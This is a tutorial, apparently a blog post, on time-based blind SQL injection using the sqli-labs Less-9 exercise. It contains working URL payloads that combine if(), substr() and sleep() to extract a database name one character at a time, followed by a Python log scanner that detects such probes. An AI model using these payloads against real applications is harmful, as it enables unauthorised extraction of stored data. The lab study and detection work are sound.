SQL Injection - Time Blind Injection

Table of contents

1. Overview of Time Blind Injection

2. Key functions

sleep()

if()

3. Injection principle

4. Examples


1. Overview of Time Blind Injection

The web page returns the same normal page whatever the injected condition is, so the data is guessed one character at a time from differences in the page's response time. The premise is that the database executes the injected code, but the page does not feed back any of the result.

Review:

When the page echoes query results, choose union injection;

When the page does not echo results but shows an error message, choose error-based injection;

When the page neither echoes nor reports an error, but differs between true and false, choose Boolean blind injection;

When there is no echo, no error, and no true/false difference in the page, choose time blind injection.

2. Key functions

sleep()

The parameter of sleep() is the time to sleep, in seconds; it can be a decimal.

if()

if(condition, true, false)

condition is the condition to test, true is the value returned when the condition is true, and false is the value returned when the condition is false.

For example:

select if(1=1,sleep(0),sleep(3));

1=1 is true, so sleep(0) is executed and the query returns immediately.

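3. Injection principle

substr((...),1,1) returns one character of the inner query's result, starting at the first character.

Whether the condition (a greater-than/less-than comparison) is true is judged from the length of the response time:

select if(ascii(substr((select database()),1,1))>100,sleep(0),sleep(3));

With this statement, an immediate response means the condition is true and a 3-second delay means it is false.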

4. Examples

Take Less-9 as an example:

Judge whether each guess is correct from the response time of the page:

?id=1' and if(ascii(substr((select database()),1,1))>115,sleep(0),sleep(3)) --+

After the first letter is determined, change the position argument of substr to guess the second letter, and continue in the same way for each following letter until the full result is obtained:

?id=1' and if(ascii(substr((select database()),2,1))>115,sleep(0),sleep(3)) --+
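From the defender's side, requests like the ones above stand out in web-server logs. The following Python sketch is an added example, not part of the original post: it finds parameters that combine if(), substr() and sleep(), and checks whether the response was actually delayed, which shows the injected SQL ran in the database. The log format, sample lines and function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log (assumed format): client "METHOD target HTTP/x" status seconds
SAMPLE_LOG = """\
10.0.0.5 "GET /Less-9/?id=1 HTTP/1.1" 200 0.012
10.0.0.7 "GET /Less-9/?id=1%27%20and%20if(ascii(substr((select%20database()),1,1))%3E115,sleep(0),sleep(3))%20--+ HTTP/1.1" 200 3.015
10.0.0.7 "GET /Less-9/?id=1%27%20and%20if(ascii(substr((select%20database()),1,1))%3E100,sleep(0),sleep(3))%20--+ HTTP/1.1" 200 0.011
10.0.0.7 "GET /Less-9/?id=1%27%20and%20if(ascii(substr((select%20database()),2,1))%3E115,sleep(0),sleep(3))%20--+ HTTP/1.1" 200 0.013
10.0.0.9 "GET /search?q=how+to+sleep+better HTTP/1.1" 200 0.020
"""

LINE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) ([\d.]+)$')
IF_CALL = re.compile(r'\bif\s*\(', re.I)
SLEEP = re.compile(r'sleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)', re.I)
SUBSTR = re.compile(r'substr\s*\(.*?,\s*(\d+)\s*,\s*\d+\s*\)', re.I | re.S)

def find_probes(log_text):
    """Yield (client, substr position, longest requested sleep, elapsed seconds)."""
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, target, _status, elapsed = m.groups()
        # parse_qsl URL-decodes each value, so %27 and %3E are matched as ' and >
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            sleeps = [float(s) for s in SLEEP.findall(value)]
            if sleeps and IF_CALL.search(value):
                pos = SUBSTR.search(value)
                yield client, int(pos.group(1)) if pos else None, max(sleeps), float(elapsed)

def summarise(log_text, slack=0.5):
    """Per client: number of probes, how many really delayed, substr positions tried."""
    report = {}
    for client, pos, sleep_s, elapsed in find_probes(log_text):
        r = report.setdefault(client, {"probes": 0, "delayed": 0, "positions": set()})
        r["probes"] += 1
        # A response about as slow as the requested sleep means the SQL executed.
        r["delayed"] += int(sleep_s > 0 and elapsed >= sleep_s - slack)
        if pos is not None:
            r["positions"].add(pos)
    return report

if __name__ == "__main__":
    for client, r in summarise(SAMPLE_LOG).items():
        print(client, r)
```

A non-zero "delayed" count separates a parameter that is actually injectable from one that was merely probed, and the set of positions shows how far the character-by-character guessing has progressed.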

Origin blog.csdn.net/heyingcheng/article/details/129388602